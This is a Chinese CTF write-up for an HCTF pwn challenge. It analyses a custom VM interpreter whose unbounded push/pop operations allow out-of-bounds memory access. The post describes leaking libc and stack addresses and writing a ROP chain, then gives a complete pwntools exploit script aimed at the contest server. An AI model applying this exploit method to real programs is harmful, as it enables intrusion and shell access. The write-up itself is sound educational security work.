这个周末刚打完了今年xctf联赛的第一站HCTF,做一下笔记吧。做这个题花了很久的时间去找漏洞,找到了漏洞之后感觉可以总结一些分析漏洞的思路
文件结构
本题给了三个文件hello.asm,make_code(64位可执行程序),pwn(32位可执行程序)。Hello.asm是一段示例asm代码,make_code程序可以对输入的asm程序编译,pwn则负责解析执行编译出的程序。
因为需要攻击的对象是pwn,所以这里我们分析的目标主要是pwn,必要时通过分析make_code来确定asm代码的格式
逻辑分析
来看一下pwn的逻辑
在
read_bin_10d0()函数里面主要是做了一些数据读入和虚拟内存初始化等相关操作,仔细分析这里面并没有发现什么可以利用的漏洞(一开始还天真的以为发现了一个整数溢出漏洞~~~)。
这里我们主要关注 run_f9a()函数,这个函数完成了数据的解析执行:
1、首先检查vpc是否在合法范围
2、提取指令操作码
注意分析push和pop操作。对于push操作,程序只是限制了vsp下边界,但没有限制上边界,这就意味着可以往高地址内存写入数据。类似的,我们可以通过pop操作从低地址内存读取数据。在一般情况下,linux程序的内存map如下图所示
vsp的合法范围是在heap中,但是我们可以利用上面提到的逻辑漏洞来从bss段中读取数据(libc地址和stack地址)以及向stack写入rop链来达到最终获取shell的目的
获取libc地址
通过分析程序,我们发现可以通过lea指令将bss段的地址放到虚拟寄存器中,然后结合mov r0, pc,我们就可以计算出heap和bss段的相对位移,进而为我们修改vsp的值(使其指向bss段)提供了基础。通过上述操作,我们可以将vsp指向GOT表,然后调用pop指令将libc中函数地址存放到我们可读写的区域(虚拟寄存器)中。
获取stack地址
获取libc地址我们依然无法控制程序,因为我们没有办法修改got表,但我们可以利用push操作在栈上构造rop链,而构造rop链的前提是需要获取栈上的某一个位置的地址
继续搜索,我们可以在处理函数调用的地方找到方法
这里
data是一个全局地址,而&_esp是栈上的一个地址,也就是说,我们通过一个函数调用[call puts]就可以把一个栈地址存放到bss段中。然后在利用pop指令就可以获得栈的地址
获取shell
完成了以上两个步骤,我们就只需要通过push操作来写入rop链了。
下面是利用代码:
from pwn import *
debug = 0
log = 1
if log: context.log_level = True
if debug:
asm_code = """data:
0x23206873,0x726f776f,0x646c
end
push data
call puts
lea r0,r2
mov r1,pc
sub r2,r1,r0
sub sp,sp,r2
add sp,sp,0x27
pop r0
sub sp,sp,0x24
pop r1
pop r2
add r0,r0,0x80
mov sp,r0
push data
push 0x0
add r1,r1,0x22350
push r1
push 0x0
add r2,r2,0x3d4
push r2
$
"""
else:
asm_code = """data:
0x23206873,0x726f776f,0x646c
end
push data
call puts
lea r0,r2
mov r1,pc
sub r2,r1,r0
sub sp,sp,r2
add sp,sp,0x27
pop r0
sub sp,sp,0x24
pop r1
pop r2
add r0,r0,0x80
mov sp,r0
push data
push 0x0
add r1,r1,0x22400
push r1
push 0x0
add r2,r2,0x3d4
push r2
$
"""
pm = process('./make_code')
pm.recvline()
pm.sendline(asm_code)
binary = pm.recv(1000)
if debug:
p = process('./pwn')
else:
p = remote('115.28.78.54', 23333)
p.sendline('b66888c818c08d932ea91b8d6a1f122c2y7ZAdbh')
if debug: gdb.attach(p, open('debug'))
p.recvuntil('bin')
p.sendline(binary)
p.interactive()
